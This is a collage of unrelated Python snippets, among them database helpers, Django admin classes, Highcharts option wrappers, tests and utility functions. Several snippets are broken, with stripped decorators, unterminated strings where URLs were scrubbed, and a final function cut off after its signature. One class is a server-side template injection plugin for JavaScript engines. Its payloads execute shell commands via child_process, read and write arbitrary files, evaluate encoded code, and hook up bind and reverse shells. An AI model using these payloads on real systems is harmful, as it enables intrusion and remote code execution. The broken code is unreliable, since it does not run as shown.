    # NOTE(review): connect_timeout is only passed for non-pymssql drivers —
    # presumably pymssql rejects it in connect_args; verify against driver docs.
    if 'pymssql' not in connection_string:
        connect_args = {'connect_timeout': 10}
    else:
        connect_args = {}
    try:
        engine = sqlalchemy.create_engine(connection_string, connect_args=connect_args)
    except Exception as err:
        raise Exception('Failed to create engine!') from err
    try:
        with engine.begin() as connection:
            connection.execute('SELECT 1')
    except Exception as err:
        raise Exception(f'''Database connection failed with engine:
{engine}!''') from err
    return engine
def downgrade():
    """Alembic downgrade: drop user.password_hash and recreate the sessions table."""
    op.drop_column('user', 'password_hash')
    op.create_table('sessions', sa.Column('id', sa.INTEGER(), nullable=False), sa.Column('session_id', sa.VARCHAR(length=255), nullable=True), sa.Column('data', sa.BLOB(), nullable=True), sa.Column('expiry', sa.DATETIME(), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('session_id'))
# NOTE(review): the next line looks like decorator arguments whose decorator
# name was lost in extraction (likely @admin.register(Book) or an
# AdminSite registration helper) — TODO confirm against VCS.
(Book)
class BookAdmin(CustomAdmin):
    """Django admin configuration for Book with autocomplete-backed filters."""
    autocomplete_fields = ['author', 'coll']
    fields = ['isbn', 'title', 'author', 'coll']
    inlines = []
    list_display = ['isbn', 'title']
    list_display_links = ['title']
    # Hand-written filter classes...
    list_filter = [AuthorFilter, CollectionFilter, PeopleWithFavBookFilter]
    # ...and their autocomplete-factory equivalents.
    list_filter_auto = [AutocompleteFilterFactory('author (auto)', 'author'), AutocompleteFilterFactory('collection (auto)', 'coll'), AutocompleteFilterFactory('people with this fav book (auto)', 'people_with_this_fav_book')]
    ordering = ['isbn']
    search_fields = ['isbn', 'title', 'author__name', 'coll__name']
class OptionSeriesTreemapMarker(Options):
    """Generated Highcharts option wrapper for treemap series markers.

    Options appear as getter/setter pairs sharing one name.
    NOTE(review): as written the later def shadows the earlier one — the
    @property / @<name>.setter decorators appear to have been stripped
    from this extract. TODO confirm against the generator's output.
    """

    def enabled(self):
        return self._config_get(None)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def enabledThreshold(self):
        # Default threshold: 2.
        return self._config_get(2)

    def enabledThreshold(self, num: float):
        self._config(num, js_type=False)

    def fillColor(self):
        return self._config_get(None)

    def fillColor(self, text: str):
        self._config(text, js_type=False)

    def height(self):
        return self._config_get(None)

    def height(self, num: float):
        self._config(num, js_type=False)

    def lineColor(self):
        # Default marker outline colour: white.
        return self._config_get('#ffffff')

    def lineColor(self, text: str):
        self._config(text, js_type=False)

    def lineWidth(self):
        return self._config_get(0)

    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    def radius(self):
        return self._config_get(4)

    def radius(self, num: float):
        self._config(num, js_type=False)

    def states(self) -> 'OptionSeriesTreemapMarkerStates':
        # Nested sub-options object.
        return self._config_sub_data('states', OptionSeriesTreemapMarkerStates)

    def symbol(self):
        return self._config_get(None)

    def symbol(self, text: str):
        self._config(text, js_type=False)

    def width(self):
        return self._config_get(None)

    def width(self, num: float):
        self._config(num, js_type=False)
def update_node_packages(bench_path='.', apps=None, verbose=None):
    """Update JS dependencies, choosing npm or yarn by the frappe develop version.

    Versions below 11.x use npm; 11 and newer use yarn.
    """
    print('Updating node packages...')
    from distutils.version import LooseVersion
    from bench.utils.app import get_develop_version
    develop_version = LooseVersion(get_develop_version('frappe', bench_path=bench_path))
    if develop_version < LooseVersion('11.x.x-develop'):
        update_npm_packages(bench_path, apps=apps, verbose=verbose)
    else:
        update_yarn_packages(bench_path, apps=apps, verbose=verbose)
def get_place_trends(ids, exclude=None):
    """Fetch Twitter trends for one or more WOEIDs and rank them by volume.

    Returns a DataFrame of trends merged with available-trends metadata,
    carrying dense per-location and per-country ranks by tweet volume.
    *exclude* is currently unused — kept for interface compatibility.
    """
    client = Twython(**get_place_trends.get_auth_params())
    collected = pd.DataFrame()
    if isinstance(ids, int):
        ids = [ids]
    for woeid in ids:
        resp = client.get_place_trends(id=woeid)
        frame = pd.DataFrame(resp[0]['trends'])
        frame = frame.sort_values(['tweet_volume'], ascending=False)
        location_info = resp[0]['locations'][0]
        frame['location'] = location_info['name']
        frame['woeid'] = location_info['woeid']
        frame['time'] = pd.to_datetime(resp[0]['created_at'])
        collected = pd.concat([collected, frame], ignore_index=True)
    collected = collected.sort_values(['woeid', 'tweet_volume'], ascending=[True, False])
    collected = collected.reset_index(drop=True)
    meta = get_available_trends()
    meta = meta[['country', 'parentid', 'woeid', 'place_type']]
    merged = pd.merge(collected, meta, on='woeid')
    merged['local_rank'] = merged.groupby('woeid')['tweet_volume'].rank(method='dense', ascending=False)
    merged['country_rank'] = merged.groupby('country')['tweet_volume'].rank(method='dense', ascending=False)
    return merged[['name', 'location', 'tweet_volume', 'local_rank', 'country', 'country_rank', 'time', 'place_type', 'promoted_content', 'woeid', 'parentid']]
def test_mar_values():
    """MAR@k sanity check on a tiny 3-user, 3-item ranked dataset."""
    # Users a/b/c each rank 3 predictions; 'target' marks relevant items.
    current = pd.DataFrame(data=dict(user_id=['a', 'a', 'a', 'b', 'b', 'b', 'c', 'c', 'c'], prediction=[1, 2, 3, 1, 2, 3, 1, 2, 3], target=[1, 0, 0, 0, 0, 0, 0, 0, 1]))
    metric = MARKMetric(k=2)
    report = Report(metrics=[metric])
    column_mapping = ColumnMapping(recommendations_type=RecomType.RANK)
    report.run(reference_data=None, current_data=current, column_mapping=column_mapping)
    results = metric.get_result()
    # One value per cutoff 1..3; mean recall rises once the deeper
    # relevant item (user c, rank 3) enters the cutoff.
    assert (len(results.current) == 3)
    assert (results.current[1] == 0.5)
    assert (results.current[2] == 0.5)
    assert (results.current[3] == 1)
def try_load(path: Path, load=pickle.load, mode: str='rb'):
    """Deserialize *path* with *load* (default pickle), returning None on failure.

    BUGFIX: the file is now opened in a ``with`` block so the handle is
    always closed; the original passed ``open(path, mode)`` straight to
    *load* and left closing to the garbage collector.

    Load errors (I/O, unpickling, truncated data) are logged at WARNING
    and swallowed so a corrupt or missing file is simply ignored.
    """
    try:
        with open(path, mode) as handle:
            return load(handle)
    except (OSError, pickle.UnpicklingError, RuntimeError, EOFError) as exc:
        logger.warning('An error happened when trying to load from %s, this file will be ignored: %r', path, exc)
        return None
class StorageBucket(resource_class_factory('bucket', 'id')):
    """GCS bucket resource wrapper exposing IAM and ACL policy fetchers."""

    # NOTE(review): the bare string below looks like a mangled decorator
    # (e.g. @cached('iam_policy')) — TODO confirm against VCS.
    ('iam_policy')
    def get_iam_policy(self, client=None):
        """Fetch the bucket's IAM policy; on API failure, record a warning and return None."""
        try:
            (data, _) = client.fetch_storage_bucket_iam_policy(self.key())
            return data
        except (api_errors.ApiExecutionError, ResourceNotSupported) as e:
            err_msg = ('Could not get Bucket IAM Policy for %s in project %s: %s' % (self.key(), self.parent().key(), e))
            LOGGER.warning(err_msg)
            self.add_warning(err_msg)
            return None

    # NOTE(review): likewise a likely mangled decorator for this method.
    ('gcs_policy')
    def get_gcs_policy(self, client=None):
        """Return the bucket ACL, preferring a locally cached 'acl' entry over the API."""
        try:
            # Prefer the ACL already present on the resource data.
            if self['acl']:
                return self['acl']
        except KeyError:
            pass
        try:
            (data, _) = client.fetch_storage_bucket_acls(self.key(), self.parent()['projectId'], self.parent()['projectNumber'])
            return data
        except (api_errors.ApiExecutionError, ResourceNotSupported) as e:
            err_msg = ('Could not get Bucket ACL Policy for %s in project %s: %s' % (self.key(), self.parent().key(), e))
            LOGGER.warning(err_msg)
            self.add_warning(err_msg)
            return None
def test_save_string_model(mock_client):
    """Round-trip: save a plain string as a model, fetch it back, compare."""
    with mock.patch('foundry_dev_tools.cached_foundry_client.CachedFoundryClient.api', mock_client):
        cfc = CachedFoundryClient()
        model = 'simplestring'
        (rid, transaction) = cfc.save_model(model, dataset_path_or_rid='/Namespace1/project1/save_model_test', branch='master', exists_ok=True, mode='SNAPSHOT')
        from_foundry = cfc.fetch_dataset('/Namespace1/project1/save_model_test')
        import pickle
        # The saved model is pickled to model.pickle inside the dataset folder.
        with Path(from_foundry[0]).joinpath('model.pickle').open(mode='rb') as f:
            model_returned = pickle.load(f)
        assert (model == model_returned)
class IntegrationManifestSchema(Schema):
    """Marshmallow schema for an integration package's manifest."""
    name = fields.Str(required=True)
    version = fields.Str(required=True)
    release = fields.Str(required=True)
    description = fields.Str(required=True)
    download = fields.Str(required=True)
    conditions = fields.Dict(required=True)
    policy_templates = fields.List(fields.Dict)
    owner = fields.Dict(required=False)

    # NOTE(review): the bare `_load` below looks like a mangled decorator
    # (likely @post_load) — TODO confirm against VCS.
    _load
    def transform_policy_template(self, data, **kwargs):
        """After load, collapse policy_templates dicts to just their 'name' values."""
        if ('policy_templates' in data):
            data['policy_templates'] = [policy['name'] for policy in data['policy_templates']]
        return data
def main():
    """CLI entry point: open the cache DB and dispatch exactly one action.

    Actions are mutually exclusive and checked in a fixed priority order;
    the first matching flag runs and the function returns.
    """
    args = parse_cmd_arguments()
    db_file = os.path.abspath(args.db)
    if not os.path.exists(db_file):
        raise RuntimeError('database does not exist at: ' + db_file)
    db_conn = sqlite3.connect(db_file)
    if args.del_entry_by_id is not None:
        del_entry(db_conn=db_conn, table=args.table, entry_id=args.del_entry_by_id, op_type=args.op_type)
        return
    if args.query_missing_75_entries_from_80:
        process_missing_75_entries_from_80(db_conn=db_conn, table=args.table, op_type=args.op_type, gen_sm75_entry=False)
        return
    if args.gen_75_entries_from_80:
        process_missing_75_entries_from_80(db_conn=db_conn, table=args.table, op_type=args.op_type, gen_sm75_entry=True)
        return
    if args.query_device is not None or args.query_all_devices:
        # --query-all-devices means "no device filter".
        target_device = None if args.query_all_devices else args.query_device
        assert args.op_type != 'all', "cannot query 'all' op_type"
        cursor = db_conn.cursor()
        query_cache(db_conn_cur=cursor, table=args.table, op_type=args.op_type, op_keys=args.op_keys, query_template=DEFAULT_QUERY_TEMPLATE, algo=args.algo, device=target_device)
        return
    # Remaining actions require op_keys.
    if args.op_keys is None:
        raise RuntimeError('Please specify op_keys')
    if args.gen_one_75_entry_from_80:
        gen_one_75_entry_from_80(db_conn=db_conn, table=args.table, op_type=args.op_type, op_keys=args.op_keys, algo=args.algo)
        return
class OptionPlotoptionsFunnelSonificationTracksMapping(Options):
    """Generated Highcharts option wrapper for funnel sonification track mappings.

    Most accessors return lazily-created nested sub-option objects.
    NOTE(review): `text` appears as a getter/setter pair; the later def
    shadows the earlier — @property / setter decorators appear stripped
    from this extract. TODO confirm against the generator's output.
    """

    def frequency(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingFrequency':
        return self._config_sub_data('frequency', OptionPlotoptionsFunnelSonificationTracksMappingFrequency)

    def gapBetweenNotes(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingGapbetweennotes':
        return self._config_sub_data('gapBetweenNotes', OptionPlotoptionsFunnelSonificationTracksMappingGapbetweennotes)

    def highpass(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingHighpass':
        return self._config_sub_data('highpass', OptionPlotoptionsFunnelSonificationTracksMappingHighpass)

    def lowpass(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingLowpass':
        return self._config_sub_data('lowpass', OptionPlotoptionsFunnelSonificationTracksMappingLowpass)

    def noteDuration(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingNoteduration':
        return self._config_sub_data('noteDuration', OptionPlotoptionsFunnelSonificationTracksMappingNoteduration)

    def pan(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingPan':
        return self._config_sub_data('pan', OptionPlotoptionsFunnelSonificationTracksMappingPan)

    def pitch(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingPitch':
        return self._config_sub_data('pitch', OptionPlotoptionsFunnelSonificationTracksMappingPitch)

    def playDelay(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingPlaydelay':
        return self._config_sub_data('playDelay', OptionPlotoptionsFunnelSonificationTracksMappingPlaydelay)

    def rate(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingRate':
        return self._config_sub_data('rate', OptionPlotoptionsFunnelSonificationTracksMappingRate)

    def text(self):
        return self._config_get(None)

    def text(self, text: str):
        self._config(text, js_type=False)

    def time(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingTime':
        return self._config_sub_data('time', OptionPlotoptionsFunnelSonificationTracksMappingTime)

    def tremolo(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingTremolo':
        return self._config_sub_data('tremolo', OptionPlotoptionsFunnelSonificationTracksMappingTremolo)

    def volume(self) -> 'OptionPlotoptionsFunnelSonificationTracksMappingVolume':
        return self._config_sub_data('volume', OptionPlotoptionsFunnelSonificationTracksMappingVolume)
class RequestAccessPermissionButton(widgets.Button):
    """Preferences button that validates Last.fm credentials and opens the auth page.

    NOTE(review): two string literals in check_connection appear scrubbed
    (URLs removed by extraction), leaving unterminated strings — lines kept
    byte-identical; restore the URLs from VCS before running this code.
    """
    name = 'plugin/lastfmlove/request_access_permission'

    def __init__(self, preferences, widget):
        widgets.Button.__init__(self, preferences, widget)
        # Message bar shown inside the preferences box for errors/warnings.
        self.message = dialogs.MessageBar(parent=preferences.builder.get_object('preferences_box'), buttons=Gtk.ButtonsType.CLOSE)
        self.errors = {pylast.STATUS_INVALID_API_KEY: _('The API key is invalid.')}

    def check_connection(self):
        """Try to log in with the configured credentials; on success open the auth URL."""
        api_key = settings.get_option('plugin/lastfmlove/api_key', 'K')
        try:
            pylast.LastFMNetwork(api_key=api_key, api_secret=settings.get_option('plugin/lastfmlove/api_secret', 'S'), username=settings.get_option('plugin/ascrobbler/user', ''), password_hash=settings.get_option('plugin/ascrobbler/password', ''))
        except pylast.WSError as e:
            GLib.idle_add(self.message.show_error, self.errors[int(e.get_id())], _('Please make sure the entered data is correct.'))
        else:
            # NOTE(review): scrubbed URL literal below — original likely
            # passed the Last.fm auth URL before Gdk.CURRENT_TIME.
            application_launched = Gtk.show_uri(Gdk.Screen.get_default(), ' Gdk.CURRENT_TIME)
            if (not application_launched):
                url = '
                GLib.idle_add(self.message.show_warning, _('Could not start web browser'), _('Please copy the following URL and open it with your web browser:\n<b><a href="{url}">{url}</a></b>').format(url=url))

    def on_clicked(self, button):
        self.check_connection()
def test_comparison_refs():
    """Smoke test: comparison operators on Promises build expression objects."""

    def dummy_node(node_id) -> Node:
        # Minimal node wrapping a trivial SQLTask, with a forced id.
        n = Node(node_id, metadata=None, bindings=[], upstream_nodes=[], flyte_entity=SQLTask(name='x', query_template='x', inputs={}))
        n._id = node_id
        return n
    px = Promise('x', NodeOutput(var='x', node=dummy_node('n1')))
    py = Promise('y', NodeOutput(var='y', node=dummy_node('n2')))

    def print_expr(expr):
        print(f'{expr} is type {type(expr)}')
    # Promise-to-promise comparisons, boolean combinators, and
    # promise-to-literal comparisons must all evaluate without raising.
    print_expr((px == py))
    print_expr((px < py))
    print_expr(((px == py) & (px < py)))
    print_expr((((px == py) & (px < py)) | (px > py)))
    print_expr((px < 5))
    print_expr((px >= 5))
    print_expr((px != 5))
def unsupported_feature():
    """Print an upgrade notice (old Python / dnspython) and exit with status 127."""
    notice = (
        'Error: You have an unsupported version of Python interpreter dnspython library.',
        '       Some features such as DoT and DoH are not available. You should upgrade',
        '       the Python interpreter to at least 3.7 and reinstall dependencies.',
    )
    for line in notice:
        print(line)
    sys.exit(127)
def gen_common_macros(out):
    """Write VAR_<TYPE>_INIT / VAR_<TYPE>_CHECK C macros for all scalar types to *out*."""
    out.write('\n/**\n * Macros for initializing and checking scalar types\n *\n * var The variable being initialized or checked\n * val The integer value to set/check against, see below\n *\n * Note that equality means something special for strings. Each byte\n * is initialized to an incrementing value. So check is done against that.\n *\n */\n\n')
    for t in scalar_types:
        if (t in integer_types):
            # Integers: plain cast assignment and equality check.
            out.write(('\n#define VAR_%s_INIT(var, val) var = (%s)(val)\n#define VAR_%s_CHECK(var, val) ((var) == (%s)(val))\n' % (t.upper(), t, t.upper(), t)))
        else:
            # Strings: byte-fill helpers handle init and comparison.
            out.write(('\n#define VAR_%s_INIT(var, val) \\\n    of_test_str_fill((uint8_t *)&(var), val, sizeof(var))\n#define VAR_%s_CHECK(var, val) \\\n    of_test_str_check((uint8_t *)&(var), val, sizeof(var))\n' % (t.upper(), t.upper())))
def Base(search_manager_regconfig):
    """Pytest fixture: fresh declarative Base wired for search, with full teardown.

    Everything after the yield restores the module-global search manager
    state so one test's regconfig cannot leak into the next.
    """
    Base = declarative_base()
    make_searchable(Base.metadata)
    if search_manager_regconfig:
        search_manager.options['regconfig'] = search_manager_regconfig
    (yield Base)
    # Teardown: restore default regconfig and clear accumulated state.
    search_manager.options['regconfig'] = 'pg_catalog.english'
    search_manager.processed_columns = []
    vectorizer.clear()
    remove_listeners(Base.metadata)
class Treemap():
    """Render two trees side-by-side as hatched treemap diagrams via matplotlib.

    *trees* is an iterable of (title, sizes, tree, labels) tuples; two are
    drawn, one per subplot. Leaf nodes are ints that index into the
    corresponding *sizes* / *labels* sequences.
    """

    def __init__(self, trees):
        self.done = False
        self.trees = trees
        self.hatches_gen = hatches()

    def compute(self):
        """Lay out and draw both trees; sets self.done on completion."""

        def new_size_method():
            # Memoized recursive size: an int leaf is its own size; an
            # iterable node is the sum of its children's sizes.
            size_cache = {}

            def _size(thing):
                if isinstance(thing, int):
                    return thing
                if thing in size_cache:
                    return size_cache[thing]
                size_cache[thing] = reduce(int.__add__, [_size(x) for x in thing])
                return size_cache[thing]
            return _size
        (fig, (ax1, ax2)) = plt.subplots(1, 2, figsize=(6, 3.5), constrained_layout=True, sharey=True)
        ax1.set_xticks([])
        ax1.set_yticks([])
        ax2.set_xticks([])
        ax2.set_yticks([])
        self.iter_method = iter
        for ((title, sizes, tree, labels), ax) in zip(self.trees, [ax1, ax2]):
            # Fresh size cache per tree (nodes may be reused across trees).
            self.size_method = new_size_method()
            self.ax = ax
            self.rectangles = []
            self.addnode(tree, lower=[0, 0], upper=[1, 1], axis=0)
            ax.set_xlabel(title)
            # Annotate leaf rectangles with "size\nlabel" at their centers.
            for (n, r) in self.rectangles:
                if isinstance(n, int):
                    size = str(sizes[n])
                    label = str(labels[n])
                    (rx, ry) = r.get_xy()
                    cx = (rx + (r.get_width() / 2.0))
                    cy = (ry + (r.get_height() / 2.0))
                    ax.annotate(f'''{size}
{label}''', (cx, cy), color='k', backgroundcolor='w', weight='bold', fontsize=9, ha='center', va='center')
        self.done = True

    def as_svg(self):
        """Return the rendered figure as an SVG string, computing first if needed."""
        if not self.done:
            self.compute()
        svg = io.BytesIO()
        plt.savefig(svg, format='svg')
        return svg.getvalue().decode(encoding='UTF-8').strip()

    def addnode(self, node, lower=None, upper=None, axis=0):
        """Recursively place *node* inside the box [lower, upper], slicing along *axis*.

        BUGFIX: the defaults were shared mutable lists ([0, 0] / [1, 1])
        which this method mutates in its loop — calling with defaults would
        corrupt every later default call. Fresh lists are created per call.
        """
        if lower is None:
            lower = [0, 0]
        if upper is None:
            upper = [1, 1]
        axis = axis % 2
        hatch = self.draw_rectangle(lower, upper, node)
        width = upper[axis] - lower[axis]
        try:
            for child in self.iter_method(node):
                if self.size_method(node) == 0:
                    continue
                # Give each child a slice proportional to its share of the
                # parent's total size, alternating the split axis per level.
                upper[axis] = lower[axis] + ((width * float(self.size_method(child))) / self.size_method(node))
                self.addnode(child, list(lower), list(upper), axis + 1)
                lower[axis] = upper[axis]
        except TypeError:
            # int leaves are not iterable — recursion bottoms out here.
            pass

    def draw_rectangle(self, lower, upper, node):
        """Draw *node*'s rectangle; leaves (ints) get the next hatch pattern."""
        h = None
        if isinstance(node, int):
            h = next(self.hatches_gen)
        r = Rectangle(lower, upper[0] - lower[0], upper[1] - lower[1], edgecolor='k', fill=False, hatch=h)
        self.ax.add_patch(r)
        self.rectangles.append((node, r))
        return h
def test_parse_arg_level_1(caplog):
    """--level 1 must emit the 'Going to run Level 1 tests' log record."""
    args = [path.relpath(__file__), '--debug', '--level', '1']
    cis_audit.parse_arguments(argv=args)
    # Scan captured log records for the expected message.
    status = False
    for record in caplog.records:
        if (record.msg == 'Going to run Level 1 tests'):
            status = True
            break
    assert status
class TimeField(Field):
    """Serializer field for datetime.time values.

    Parses incoming strings against configured input formats (ISO 8601 or
    strptime patterns) and renders outgoing values per the output format.
    """
    default_error_messages = {'invalid': _('Time has wrong format. Use one of these formats instead: {format}.')}
    datetime_parser = datetime.datetime.strptime

    def __init__(self, format=empty, input_formats=None, **kwargs):
        # `empty` sentinel lets callers pass format=None explicitly
        # (meaning "return the time object unrendered").
        if (format is not empty):
            self.format = format
        if (input_formats is not None):
            self.input_formats = input_formats
        super().__init__(**kwargs)

    def to_internal_value(self, value):
        """Parse *value* into datetime.time, trying each input format in order."""
        input_formats = getattr(self, 'input_formats', api_settings.TIME_INPUT_FORMATS)
        # Already a time — pass through unchanged.
        if isinstance(value, datetime.time):
            return value
        for input_format in input_formats:
            if (input_format.lower() == ISO_8601):
                try:
                    parsed = parse_time(value)
                except (ValueError, TypeError):
                    # Try the next configured format.
                    pass
                else:
                    if (parsed is not None):
                        return parsed
            else:
                try:
                    parsed = self.datetime_parser(value, input_format)
                except (ValueError, TypeError):
                    pass
                else:
                    # strptime yields a datetime; keep only the time part.
                    return parsed.time()
        # Nothing matched: raise the field's 'invalid' error with a
        # human-readable list of accepted formats.
        humanized_format = humanize_datetime.time_formats(input_formats)
        self.fail('invalid', format=humanized_format)

    def to_representation(self, value):
        """Render *value* per the output format (None → None, str passes through)."""
        if (value in (None, '')):
            return None
        output_format = getattr(self, 'format', api_settings.TIME_FORMAT)
        if ((output_format is None) or isinstance(value, str)):
            return value
        assert (not isinstance(value, datetime.datetime)), 'Expected a `time`, but got a `datetime`. Refusing to coerce, as this may mean losing timezone information. Use a custom read-only field and deal with timezone issues explicitly.'
        if (output_format.lower() == ISO_8601):
            return value.isoformat()
        return value.strftime(output_format)
class Solution():
    """LeetCode 39 — Combination Sum, via counted inclusion of each candidate."""

    def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:
        """Return all unique combinations of candidates (reuse allowed) summing to target.

        Candidates are sorted first, so each emitted combination is
        nondecreasing and no duplicates arise.
        """
        candidates.sort()
        results: List[List[int]] = []

        def explore(idx, remaining, chosen):
            # Decide how many copies of candidates[idx] to take, then recurse.
            if remaining < 0:
                return
            if remaining == 0:
                results.append(list(chosen))
                return
            if idx >= len(candidates):
                return
            value = candidates[idx]
            count = 0
            while count * value <= remaining:
                explore(idx + 1, remaining - count * value, chosen + [value] * count)
                count += 1

        explore(0, target, [])
        return results
class OptionNavigationBreadcrumbsSeparator(Options):
    """Generated Highcharts option wrapper for the breadcrumbs separator.

    NOTE(review): `text` appears as a getter/setter pair; the later def
    shadows the earlier — @property / setter decorators appear stripped
    from this extract. TODO confirm against the generator's output.
    """

    def style(self) -> 'OptionNavigationBreadcrumbsSeparatorStyle':
        # Nested sub-options object for separator styling.
        return self._config_sub_data('style', OptionNavigationBreadcrumbsSeparatorStyle)

    def text(self):
        # Default separator character: '/'.
        return self._config_get('/')

    def text(self, text: str):
        self._config(text, js_type=False)
def fetch_consumption(zone_key: str='KW', session: (Session | None)=None, target_datetime: (datetime | None)=None, logger: Logger=getLogger(__name__)):
    """Fetch the current electricity consumption for Kuwait (mew.gov.kw).

    Only live data is supported; passing *target_datetime* raises.
    NOTE(review): the URL literal below appears scrubbed by extraction,
    leaving an unterminated string — line kept byte-identical; restore
    the source URL from VCS before running this code.
    """
    if target_datetime:
        raise NotImplementedError('This parser is not yet able to parse past dates')
    r = (session or Session())
    url = '
    response = r.get(url)
    # The page embeds the load as a 4-5 digit number in parentheses.
    load = re.findall('\\((\\d{4,5})\\)', response.text)
    load = int(load[0])
    consumption = load
    datapoint = {'zoneKey': zone_key, 'datetime': datetime.now(tz=ZoneInfo('Asia/Kuwait')), 'consumption': consumption, 'source': 'mew.gov.kw'}
    return datapoint
class InlineCKEditorWidget(forms.Textarea):
    """Textarea widget that attaches an inline CKEditor instance via data attributes."""

    def __init__(self, *args, **kwargs):
        # Fall back to the module-level URL/config when not supplied.
        self.ckeditor = (kwargs.pop('ckeditor') or _url())
        self.config = (kwargs.pop('config') or _config()['default'])
        attrs = kwargs.setdefault('attrs', {})
        # id(self.config) ties the DOM element to its serialized config below.
        attrs['data-inline-cke'] = id(self.config)
        if (django.VERSION < (4, 2)):
            # Compatibility marker for pre-4.2 media/script rendering.
            attrs['data-inline-cke-dj41'] = True
        super().__init__(*args, **kwargs)

    # NOTE(review): widget `media` is conventionally a property (or built by
    # a media metaclass) — a decorator may have been stripped from this
    # extract; confirm before relying on call form.
    def media(self):
        """CSS/JS assets: widget stylesheet, the CKEditor build, and the init script."""
        return forms.Media(css={'all': ['feincms3/inline-ckeditor.css']}, js=[self.ckeditor, JS('feincms3/inline-ckeditor.js', {'data-inline-cke-id': id(self.config), 'data-inline-cke-config': json.dumps(self.config, cls=DjangoJSONEncoder), 'defer': 'defer'})])
def gen_string(uni_str, exception=False):
    """Encode *uni_str* as an MQTT UTF-8 string: 2-byte big-endian length + bytes.

    Embedded NUL bytes are stripped (MQTT forbids U+0000). On any problem
    the function returns b'' unless *exception* is True, in which case the
    underlying TypeError / ValueError / UnicodeError is raised instead.
    """
    if uni_str is None:
        if exception:
            raise TypeError('None not allowed')
        return b''
    if not hasattr(uni_str, 'encode'):
        if exception:
            raise TypeError('uni_str required function encode(format)')
        return b''
    try:
        utf8_str = uni_str.encode('utf8')
        if MQTT_NONE_CHAR in utf8_str:
            if exception:
                raise ValueError('char 0x0000 not allowed')
            utf8_str = utf8_str.replace(MQTT_NONE_CHAR, b'')
        str_size = len(utf8_str)
        fmt = '!H' + 'B' * str_size
        byte_str = tuple(utf8_str)
        return struct.pack(fmt, str_size, *byte_str)
    except UnicodeError as ex:
        # BUGFIX: str.encode raises UnicodeEncodeError, but the original
        # caught UnicodeDecodeError only, so encode failures escaped even
        # with exception=False. UnicodeError covers both directions.
        if exception:
            raise ex
    except TypeError as ex:
        if exception:
            raise ex
    return b''
class Javascript(Plugin):
    """SSTI exploitation plugin for JavaScript template engines.

    Registers render/read/write/execute payload templates and the injection
    contexts used to break out of surrounding template syntax. All template
    strings are runtime payload data and must not be altered.
    """

    def language_init(self):
        """Install the JavaScript payload actions and escape contexts."""
        # Action payloads: each entry maps a capability to the JS snippet
        # (with %(...)s placeholders) used to perform it.
        self.update_actions({'render': {'call': 'inject', 'render': '%(code)s', 'header': "'%(header)s'+", 'trailer': "+'%(trailer)s'", 'test_render': ('typeof(%(r1)s)+%(r2)s' % {'r1': rand.randints[0], 'r2': rand.randints[1]}), 'test_render_expected': ('number%(r2)s' % {'r2': rand.randints[1]})}, 'write': {'call': 'inject', 'write': "require('fs').appendFileSync('%(path)s', Buffer('%(chunk_b64)s', 'base64'), 'binary')//", 'truncate': "require('fs').writeFileSync('%(path)s', '')"}, 'read': {'call': 'render', 'read': "require('fs').readFileSync('%(path)s').toString('base64')"}, 'md5': {'call': 'render', 'md5': 'require(\'crypto\').createHash(\'md5\').update(require(\'fs\').readFileSync(\'%(path)s\')).digest("hex")'}, 'evaluate': {'call': 'render', 'evaluate': "eval(Buffer('%(code_b64)s', 'base64').toString())", 'test_os': "require('os').platform()", 'test_os_expected': '^[\\w-]+$'}, 'blind': {'call': 'execute_blind', 'test_bool_true': 'true', 'test_bool_false': 'false'}, 'execute_blind': {'call': 'inject', 'execute_blind': "require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString() + ' && sleep %(delay)i')//"}, 'execute': {'call': 'render', 'execute': "require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString())", 'test_cmd': (bash.printf % {'s1': rand.randstrings[2]}), 'test_cmd_expected': rand.randstrings[2]}, 'bind_shell': {'call': 'execute_blind', 'bind_shell': bash.bind_shell}, 'reverse_shell': {'call': 'execute_blind', 'reverse_shell': bash.reverse_shell}})
        # Escape contexts ordered by escalating nesting level.
        self.set_contexts([{'level': 0}, {'level': 1, 'prefix': '%(closure)s;', 'suffix': '//', 'closures': ctx_closures}, {'level': 2, 'prefix': '%(closure)s', 'suffix': '//', 'closures': ctx_closures}, {'level': 5, 'prefix': '*/', 'suffix': '/*'}])
    language = 'javascript'
def test_metadata(fx_asset):
    """EXIF metadata mapping: iteration, membership, indexing, and .get default."""
    with Image(filename=str(fx_asset.joinpath('beach.jpg'))) as img:
        assert (len(img.metadata) > 0)
        # Keys iterate as strings.
        for key in img.metadata:
            assert isinstance(key, string_type)
        assert ('exif:ApertureValue' in img.metadata)
        assert ('exif:UnknownValue' not in img.metadata)
        assert (img.metadata['exif:ApertureValue'] == '192/32')
        # .get falls back to the supplied default for missing keys.
        assert (img.metadata.get('exif:UnknownValue', 'IDK') == 'IDK')
class MainWindow(ApplicationWindow):
    """Demo application window showing 100 random Person rows in a data view."""
    # Traits: the row data, the column description, and the widget itself.
    data = List(Instance(Person))
    row_info = Instance(AbstractRowInfo)
    data_view = Instance(IDataViewWidget)

    def _create_contents(self, parent):
        """Build and return the data-view control inside *parent*."""
        self.data_view.create(parent)
        return self.data_view.control

    def _data_default(self):
        """Trait default: generate 100 random Person records."""
        logger.info('Initializing data')
        people = [Person(name=('%s %s' % (any_name(), family_name())), age=age(), favorite_color=favorite_color(), address=Address(street=street(), city=city(), country=country())) for i in range(100)]
        logger.info('Data initialized')
        return people

    def _data_view_default(self):
        """Trait default: a data-view widget with table/CSV row exporters."""
        return DataViewWidget(data_model=ColumnDataModel(data=self.data, row_info=self.row_info), selection_mode='extended', exporters=[RowExporter(format=table_format, column_headers=True, row_headers=True), RowExporter(format=csv_format, column_headers=True)])

    def destroy(self):
        # Tear down the child widget before the window itself.
        self.data_view.destroy()
        super().destroy()
def get_fstring_from_call(ghidra_analysis, key_string, call_args, func, call, sources):
